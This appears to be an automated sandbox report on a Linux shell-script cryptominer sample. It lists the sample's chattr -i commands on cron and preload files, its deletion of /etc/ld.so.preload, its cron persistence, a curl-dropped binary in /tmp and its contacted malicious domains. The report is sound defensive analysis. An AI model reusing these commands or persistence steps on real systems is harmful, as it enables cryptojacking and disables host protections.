Source: /bin/pkill (PID: 9723) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9732) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9739) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9754) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9779) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9794) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9808) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9817) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9832) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9837) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9845) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9852) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9871) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9882) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9903) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9923) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9930) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9937) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9944) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9962) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9969) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9979) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 9992) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10000) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10017) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10030) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10044) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10051) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10063) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10071) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10090) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10108) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10126) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10133) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10144) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10153) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10160) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10167) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10175) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10194) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10202) Queries kernel information via 'uname':
Source: /bin/pkill (PID: 10221) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10417) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10464) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10498) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10541) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10577) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10614) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10649) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10675) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10712) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10742) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10773) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10808) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10839) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10870) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10906) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10944) Queries kernel information via 'uname':
Source: /bin/ps (PID: 10980) Queries kernel information via 'uname':
Source: /bin/ps (PID: 11016) Queries kernel information via 'uname':
Source: /bin/ps (PID: 11046) Queries kernel information via 'uname':
Source: /bin/ps (PID: 11079) Queries kernel information via 'uname':
Source: /bin/ps (PID: 11119) Queries kernel information via 'uname':
Source: /bin/curl (PID: 11804) Queries kernel information via 'uname':
Source: /bin/curl (PID: 12198) Queries kernel information via 'uname':
Source: /bin/curl (PID: 12403) Queries kernel information via 'uname':
Source: /bin/curl (PID: 12542) Queries kernel information via 'uname':
Source: /bin/ps (PID: 12711) Queries kernel information via 'uname':
Source: /bin/ps (PID: 12721) Queries kernel information via 'uname':
Source: /bin/curl (PID: 12765) Queries kernel information via 'uname':
Source: /tmp/r1x (PID: 13009) Queries kernel information via 'uname':

HIPS / PFW / Operating System Protection Evasion:

Deletes /etc/ld.so.preload (likely AV evasion)
Source: /bin/rm (PID: 12695) Deletion: /etc/ld.so.preload

Lowering of HIPS / PFW / Operating System Security Settings:

Removes protection from files
Source: /bin/bash (PID: 10318) Args: chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-*
Source: /bin/bash (PID: 10338) Args: chattr -i /usr/lib/libiacpkmn.so.3
Source: /bin/bash (PID: 10346) Args: chattr -i /etc/init.d/nfstruncate
Source: /bin/bash (PID: 10353) Args: chattr -i /bin/nfstruncate
Source: /bin/bash (PID: 10367) Args: chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: /bin/bash (PID: 11780) Args: chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload


Runtime Messages

Command:bash "/tmp/pcXrXrdEB2"
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:chattr: No such file or directory while trying to stat /tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/kworkerds
chattr: No such file or directory while trying to stat /var/tmp/config.json
chattr: No such file or directory while trying to stat /tmp/.systemd-private-*
chattr: No such file or directory while trying to stat /usr/lib/libiacpkmn.so.3
chattr: No such file or directory while trying to stat /etc/init.d/nfstruncate
chattr: No such file or directory while trying to stat /bin/nfstruncate
chattr: No such file or directory while trying to stat /bin/ddus-uidgen
chattr: No such file or directory while trying to stat /etc/init.d/acpidtd
chattr: No such file or directory while trying to stat /etc/rc.d/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/rc*.d/S01acpidtd
chattr: No such file or directory while trying to stat /etc/ld.sc.conf

Usage:
kill [options] <pid|name> [...]

Options:
-a; --all do not restrict the name-to-pid conversion to processes
with the same uid as the present process
-s; --signal <sig> send specified signal
-q; --queue <sig> use sigqueue(2) rather than kill(2)
-p; --pid print pids without signaling them
-l; --list [=<signal>] list signal names; or convert one to a name
-L; --table list signal names and numbers

-h; --help display this help and exit
-V; --version output version information and exit

For more details see kill(1).

/tmp/pcXrXrdEB2: line 121: rep: command not found
grep: write error

chattr: No such file or directory while trying to stat /usr/local/bin/dns
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/ld.so.preload

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
Behavior Graph ID: 784804, Sample: pcXrXrdEB2, Startdate: 11/02/2019, Architecture: LINUX, Score: 64

DNS/IP Info:

  • drnfbu.xyz resolves to 198.35.45.242, ports 26750 and 55998, IT7NET-IT7NetworksIncCA (Canada); signature: Detected TCP or UDP traffic on non-standard ports
  • 104.27.166.54, ports 42556 and 80, CLOUDFLARENET-CloudFlareIncUS (United States)
  • yxarsh.shop resolves to 104.27.167.54, ports 48248, 48250 and 48252, CLOUDFLARENET-CloudFlareIncUS (United States)

Sample-level signatures:

  • Antivirus detection for dropped file
  • Found strings related to Crypto-Mining

Processes:

  • bash (started from the sample); signature: Sample tries to persist itself using cron; children: bash (3 instances), plus 297 other processes
  • systemd polkitd; children: polkitd pkla-check-authorization (3 instances), plus 49 other processes
  • bash, children: bash curl (3 instances); signature on bash curl: Sample tries to persist itself using cron
  • 297 other processes under bash; signature: Executes the "rm" command used to delete files or directories; children: bash curl, xargs kill (2 instances), plus 35 other processes

Created files (dropped):

  • /etc/crontab, ASCII (by bash)
  • /etc/cron.d/root, ASCII (by bash)
  • /etc/cron.d/apache, ASCII (by bash)
  • /etc/cron.hourly/oanacroner, ASCII (by bash curl)
  • /etc/cron.daily/oanacroner, ASCII (by bash curl)
  • /etc/cron.monthly/oanacroner, ASCII (by bash curl)
  • /tmp/r1x, ELF (by bash curl)

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.